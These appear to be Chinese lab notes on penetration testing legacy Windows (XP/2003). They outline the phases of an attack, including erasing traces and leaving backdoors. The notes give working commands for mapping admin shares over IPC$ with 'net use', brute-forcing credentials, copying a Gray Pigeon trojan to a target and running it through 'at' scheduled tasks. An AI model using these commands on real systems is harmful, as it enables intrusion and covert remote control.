渗透测试
1.授权
2.信息收集
nslookup 查域名whois
3.扫描漏洞
namp-ip范围 端口
高级扫描–
4.漏洞利用
5. 提权(shell环境,桌面环境,最高权限)
6. 擦除痕迹
7. 留后门
8. 渗透测试报告
实验 (xp,2003)
cmd: telnet 10.1.1.2 445 (telnet常被用来探测对方端口)
ScanPort 扫端口
**1.利用445漏洞 IPC$ **
首先利用2003建立一个共享文件价,然后用命令将共享文件映射到本地
在xp 利用net use 命令 映射默认共享net use z:\iP\c$ “密码” /user:"用户名”(即可将对方的c盘映射为自己的z盘,其他盘类推)
例如: net use f: \10.1.1.2\share 密码 /user:用户
net use \10.1.1.2\ipc$ 密码?/user:用户
==删除net use f: /del net use * /del ==
将c映射到f net use f: \10.1.1.2\c$ 密码 /user:用户
暴力破解密码
NTscan10破 445
建一个批处理
copy con haha.bat
ctrl+z
开机net use --右键我的电脑–映射网络驱动器-开机自连
== u对方所有磁盘net use \10.1.1.2 \ipc$ 密码 /user:用户==
dir \10.1.1.2\c$
灰鸽子使用
将生成的木马文件放在服务器的c盘
copy d:\haha.exe \10.1.1.2\c$\windows\
然后运行,做定时执行任务,前提是建立 ipc$
net time \10.1.1.2 查看对方时间
计划运行
at \10.1.1.2 4:13 “c:\windows\hahahha.exe”
at \10.1.1.2 看正在计划的任务